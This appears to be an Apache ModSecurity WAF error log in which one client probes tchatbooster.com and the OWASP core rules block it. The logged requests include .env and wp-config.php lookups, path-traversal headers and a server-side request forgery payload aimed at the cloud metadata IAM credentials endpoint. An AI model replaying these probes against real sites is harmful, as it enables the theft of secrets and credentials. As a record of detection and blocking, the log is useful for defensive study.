[Tue May 12 04:38:58.223111 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.166:50002] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwno6NvB9WXx5V-6enwAAAQQ"]
[Tue May 12 04:38:58.223158 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.166:50002] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwno6NvB9WXx5V-6enwAAAQQ"]
[Tue May 12 04:38:58.223414 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.166:50002] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwno6NvB9WXx5V-6enwAAAQQ"]
[Tue May 12 04:38:58.228600 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSwhfeipD4uoG21FoiYgAAABc"]
[Tue May 12 04:38:58.228765 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSwhfeipD4uoG21FoiYgAAABc"]
[Tue May 12 04:38:58.236651 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.166:50002] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwno6NvB9WXx5V-6enwAAAQQ"]
[Tue May 12 04:38:58.240407 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.166:50002] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwno6NvB9WXx5V-6enwAAAQQ"]
[Tue May 12 04:38:58.240846 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.166:50002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwno6NvB9WXx5V-6enwAAAQQ"]
[Tue May 12 04:38:58.867024 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:49990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSws1tk6y7yBJLpJopawAAAJc"]
[Tue May 12 04:38:58.950121 2026] [security2:error] [pid 1730207:tid 1730232] [client 45.148.10.166:49894] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSwjue9Sp-pIv_Bb60_QAAAVc"]
[Tue May 12 04:38:58.950336 2026] [security2:error] [pid 1730207:tid 1730232] [client 45.148.10.166:49894] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSwjue9Sp-pIv_Bb60_QAAAVc"]
[Tue May 12 04:38:58.984187 2026] [security2:error] [pid 1730175:tid 1730193] [client 45.148.10.166:49852] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.old"] [unique_id "agKSwno6NvB9WXx5V-6epAAAARA"]
[Tue May 12 04:38:58.984390 2026] [security2:error] [pid 1730175:tid 1730193] [client 45.148.10.166:49852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.old"] [unique_id "agKSwno6NvB9WXx5V-6epAAAARA"]
[Tue May 12 04:38:59.009198 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.166:49962] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwjue9Sp-pIv_Bb60_AAAAUE"]
[Tue May 12 04:38:59.011220 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwhfeipD4uoG21FoiYgAAABc"]
[Tue May 12 04:38:59.017663 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.166:49908] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKSwzue9Sp-pIv_Bb60_gAAAVY"]
[Tue May 12 04:38:59.017865 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.166:49908] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKSwzue9Sp-pIv_Bb60_gAAAVY"]
[Tue May 12 04:38:59.033270 2026] [security2:error] [pid 1820198:tid 1820221] [client 45.148.10.166:49936] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKSw81tk6y7yBJLpJopcQAAAJU"]
[Tue May 12 04:38:59.033407 2026] [security2:error] [pid 1820198:tid 1820221] [client 45.148.10.166:49936] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKSw81tk6y7yBJLpJopcQAAAJU"]
[Tue May 12 04:38:59.033762 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tchatbooster.com"] [uri "/_next/image"] [unique_id "agKSwxfeipD4uoG21FoiZQAAABc"]
[Tue May 12 04:38:59.034472 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/_next/image"] [unique_id "agKSwxfeipD4uoG21FoiZQAAABc"]
[Tue May 12 04:38:59.036941 2026] [security2:error] [pid 1820198:tid 1820201] [client 45.148.10.166:49958] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php.bak"] [unique_id "agKSw81tk6y7yBJLpJopcgAAAIE"]
[Tue May 12 04:38:59.037108 2026] [security2:error] [pid 1820198:tid 1820201] [client 45.148.10.166:49958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php.bak"] [unique_id "agKSw81tk6y7yBJLpJopcgAAAIE"]
[Tue May 12 04:38:59.050457 2026] [core:error] [pid 1808852:tid 1808858] [client 45.148.10.166:49854] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 04:38:59.089458 2026] [security2:error] [pid 1730175:tid 1730200] [client 45.148.10.166:49954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwno6NvB9WXx5V-6eoQAAARc"]
[Tue May 12 04:38:59.111122 2026] [security2:error] [pid 1730175:tid 1730200] [client 45.148.10.166:49954] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKSw3o6NvB9WXx5V-6epQAAARc"]
[Tue May 12 04:38:59.111324 2026] [security2:error] [pid 1730175:tid 1730200] [client 45.148.10.166:49954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKSw3o6NvB9WXx5V-6epQAAARc"]
[Tue May 12 04:38:59.116158 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:50082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env~"] [unique_id "agKSw81tk6y7yBJLpJopcwAAAIM"], referer: https://tchatbooster.com/.env~
[Tue May 12 04:38:59.116361 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:50082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env~"] [unique_id "agKSw81tk6y7yBJLpJopcwAAAIM"], referer: https://tchatbooster.com/.env~
[Tue May 12 04:38:59.119794 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:49866] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.save"] [unique_id "agKSw3o6NvB9WXx5V-6epgAAAQw"]
[Tue May 12 04:38:59.119962 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:49866] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.save"] [unique_id "agKSw3o6NvB9WXx5V-6epgAAAQw"]
[Tue May 12 04:38:59.125177 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.166:50024] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKSw9r1yOh9TvizeziPogAAAEM"], referer: https://tchatbooster.com/.env
[Tue May 12 04:38:59.125404 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.166:50024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKSw9r1yOh9TvizeziPogAAAEM"], referer: https://tchatbooster.com/.env
[Tue May 12 04:38:59.151507 2026] [security2:error] [pid 1730207:tid 1730212] [client 45.148.10.166:50042] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKSwzue9Sp-pIv_Bb61AQAAAUM"], referer: https://tchatbooster.com/api/.env
[Tue May 12 04:38:59.151763 2026] [security2:error] [pid 1730207:tid 1730212] [client 45.148.10.166:50042] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKSwzue9Sp-pIv_Bb61AQAAAUM"], referer: https://tchatbooster.com/api/.env
[Tue May 12 04:38:59.226992 2026] [security2:error] [pid 1730175:tid 1730184] [client 45.148.10.166:49932] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/sites/default/settings.php"] [unique_id "agKSw3o6NvB9WXx5V-6eqgAAAQc"]
[Tue May 12 04:38:59.227246 2026] [security2:error] [pid 1730175:tid 1730184] [client 45.148.10.166:49932] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/sites/default/settings.php"] [unique_id "agKSw3o6NvB9WXx5V-6eqgAAAQc"]
[Tue May 12 04:38:59.270201 2026] [security2:error] [pid 1808852:tid 1808867] [client 45.148.10.166:49832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwhfeipD4uoG21FoiYQAAAAw"]
